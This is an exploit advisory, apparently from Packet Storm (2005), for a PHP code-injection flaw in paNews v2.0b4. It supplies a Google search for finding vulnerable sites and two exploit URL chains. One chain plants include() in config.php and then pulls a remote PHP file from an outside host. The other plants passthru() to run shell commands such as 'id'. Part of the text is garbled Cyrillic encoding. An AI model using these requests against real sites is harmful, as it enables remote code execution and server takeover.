paNews_v2.0b4.txt

2005-02-26T00:00:00
ID PACKETSTORM:36256
Type packetstorm
Reporter nst.e-nex.com
Modified 2005-02-26T00:00:00

Description

                    
                      `oooo oooo oooooooo8 ooooooooooo  
8888o 88 888 88 888 88  
88 888o88 888oooooo 888  
88 8888 888 888  
o88o 88 o88oooo888 o888o  
******************************** 
**** Network security team ***** 
********* nst.e-nex.com ******** 
******************************** 
* Title: paNews v2.0b4 
* Bug found by: ò¸ìû÷ 
* Date: 20.02.2005 
******************************** 
 
web: http://www.phparena.net/panews.php 
google: allintitle:paNews v2.0b4 
 
PHP Injection 
Áàãà ðàáîòàåò òîëüêî åñëè: 
1. register_globals=On 
2. íà ïàïêó includes ñòîÿò ïðàâà íà çàïèñü 
 
p.s. îòðóáèòå ÿâàñêðèïòû - javascripts =-] 
 
Example 1 
 
http://victim/panews/includes/admin_setup.php?access[]=admins&do=updatesets&form[comments]=$nst&form[autoapprove]=$nst&disvercheck=$nst&installed=$asd&showcopy=include($nst) 
 
then: 
 
http://victim/panews/includes/config.php?nst=http://your/file.php 
 
 
Example 2 
 
http://victim/panews/includes/admin_setup.php?access[]=admins&do=updatesets&form[comments]=$nst&form[autoapprove]=$nst&disvercheck=$nst&installed=$asd&showcopy=passthru($nst) 
 
then: 
 
http://victim/panews/includes/config.php?nst=id`